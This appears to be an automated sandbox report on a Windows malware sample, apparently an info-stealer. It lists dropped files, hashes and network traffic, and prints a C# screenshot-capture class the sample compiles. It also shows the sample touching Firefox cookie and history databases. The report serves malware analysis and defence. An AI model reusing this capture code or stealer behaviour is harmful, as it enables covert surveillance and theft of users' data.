                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tg1dm3o1.nds.ps1

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrc3jcte.obs.psm1

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.0.cs

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1004
                                                                                                                                                                                                                                  Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                  MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                  SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                  SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                  SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.cmdline

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (610), with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):613
                                                                                                                                                                                                                                  Entropy (8bit):5.350002690839074
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ik/aNJgWZETaNJd:V3ka6KOkqeFk/aNJhETaNJd
                                                                                                                                                                                                                                  MD5:CABE4D402C3C1C2C5AF8D9D9E5EC8EB5
                                                                                                                                                                                                                                  SHA1:73FBD3AEABC04043B1AADDF3AA2B0D65AD6E285D
                                                                                                                                                                                                                                  SHA-256:9DE9994020ECE35A6748AF789113029248AF304D5EF84FFF6694E2D8A9DA1D73
                                                                                                                                                                                                                                  SHA-512:1EF28E6381E780F2335E40C75C38F7B663F24152F460FACB5FA49A21A35B655C62656B4F5235D008941A2AE26C15E14D3C36C1C21D610FAD5B9EAF399A4CD75B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.0.cs"

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.out

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (743), with CRLF, CR line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1164
                                                                                                                                                                                                                                  Entropy (8bit):5.458977731279944
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:KOaPsMId3ka6KOkqeFk/aNJhETaNJYKax5DqBVKVrdFAMBJTH:+Plkka6NkqeFkSJE+QK2DcVKdBJj
                                                                                                                                                                                                                                  MD5:702B30D3330B4F90862A46B334749664
                                                                                                                                                                                                                                  SHA1:6349A5252A1AF0C5B3960FA73AC2A0F9D93ADC12
                                                                                                                                                                                                                                  SHA-256:020BC1798621842C7A0344EE2744080A0DFB6A4B64842F48AA662974FC7F2BA4
                                                                                                                                                                                                                                  SHA-512:17FAB9DA58A8A428D33ADFBFE4ADC08F4E367BD17BE6742D517ABC049B28C3C0CB53C4F202E49C63BCC0C1D523FD2FB16A5AB590DD1FD1C8B0552C1F75494FBC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, wh

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  File type:
                                                                                                                                                                                                                                  Entropy (8bit):7.995208917234906
                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                  File name:SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File size:9'934'907 bytes
                                                                                                                                                                                                                                  MD5:aecb2c382b2181620aa3243dcbca51c8
                                                                                                                                                                                                                                  SHA1:9b103aa29dd1f39b7bb6261703f144bfdfa4a06e
                                                                                                                                                                                                                                  SHA256:6b9568f25dba66dde3d01baa88ff15ce5165fed7c29c8446d8fab993234a49ce
                                                                                                                                                                                                                                  SHA512:ccc1f0cb5a5db4f65a5f1a21741f4c29784061f6f3da512e14b0cfcef9d949f6f414a61c3f792cb55d2e8196b8bef51b099abdab29db7948e38864a9c28f731d
                                                                                                                                                                                                                                  SSDEEP:196608:ha72hCxocemXyuSyTde8pDOlocCREhS0kCnPnqFrpAChlwc:bcgtByxjp0oVWQsPwAyT
                                                                                                                                                                                                                                  TLSH:26A63378B27009AAFDFB833CC856995ACE73745507A0C6CF07B042619D673E28935FA6
                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d..

                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                  Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:16.611922979 CET4972180192.168.2.6208.95.112.1
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:16.617242098 CET8049721208.95.112.1192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:16.617444992 CET4972180192.168.2.6208.95.112.1
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:16.618266106 CET4972180192.168.2.6208.95.112.1
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:16.623826027 CET8049721208.95.112.1192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:17.213646889 CET8049721208.95.112.1192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:17.215034008 CET4972180192.168.2.6208.95.112.1
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:17.220851898 CET8049721208.95.112.1192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:17.220998049 CET4972180192.168.2.6208.95.112.1
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:31.630204916 CET49766443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:31.630228043 CET44349766162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:31.630296946 CET49766443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:31.631037951 CET49766443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:31.631048918 CET44349766162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.256671906 CET44349766162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.257467985 CET49766443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.257491112 CET44349766162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.259139061 CET44349766162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.259208918 CET49766443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.265367031 CET49766443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.265460014 CET44349766162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.265693903 CET49766443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.265705109 CET44349766162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.265800953 CET49766443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.311327934 CET44349766162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.572977066 CET44349766162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.573121071 CET44349766162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.573390961 CET49766443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.574399948 CET49766443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.574413061 CET44349766162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.575829983 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.575871944 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.575948000 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.576576948 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:32.576587915 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.190942049 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.191705942 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.191718102 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.193186045 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.193263054 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.194459915 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.194547892 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.194843054 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.194849968 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.195050001 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.235348940 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.425586939 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.425744057 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.425796032 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.426623106 CET49767443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.426651955 CET44349767162.159.136.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.429137945 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.429172993 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.429244995 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.429697037 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:33.429713011 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.046992064 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.047555923 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.047580957 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.049026966 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.049088955 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.050239086 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.050327063 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.050560951 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.061707020 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.061728954 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.061827898 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.061856031 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.061975956 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.062026024 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.062144041 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.062159061 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.062288046 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.062314034 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.062448978 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.062475920 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.073199034 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.073357105 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.073385954 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.073410034 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.073529959 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.073561907 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.078002930 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.078142881 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.078170061 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.078193903 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.078222990 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.078270912 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.078291893 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.079668045 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.079828024 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.079854965 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.079878092 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:34.079900980 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.132029057 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.132154942 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.132215977 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.133049965 CET49768443192.168.2.6162.159.137.232
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.133063078 CET44349768162.159.137.232192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.830306053 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.830337048 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.830414057 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.831254959 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.831267118 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.680181026 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.681157112 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.681166887 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.682759047 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.683027029 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.684293985 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.684293985 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.684391975 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.729633093 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.729644060 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.776444912 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.916363955 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.916573048 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.916713953 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.917675972 CET49774443192.168.2.645.112.123.126
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:36.917692900 CET4434977445.112.123.126192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:38.366039038 CET49775443192.168.2.645.112.123.227
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:38.366077900 CET4434977545.112.123.227192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:38.366298914 CET49775443192.168.2.645.112.123.227
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:38.366942883 CET49775443192.168.2.645.112.123.227
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:38.366959095 CET4434977545.112.123.227192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:38.418566942 CET4434977545.112.123.227192.168.2.6

                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:16.593777895 CET5060753192.168.2.61.1.1.1
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:16.601882935 CET53506071.1.1.1192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:31.621450901 CET5611153192.168.2.61.1.1.1
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:31.628758907 CET53561111.1.1.1192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.820827007 CET6089653192.168.2.61.1.1.1
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:35.829410076 CET53608961.1.1.1192.168.2.6
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:37.171366930 CET6193753192.168.2.61.1.1.1
                                                                                                                                                                                                                                  Oct 28, 2024 08:20:38.167334080 CET6193753192.168.2.61.1.1.1
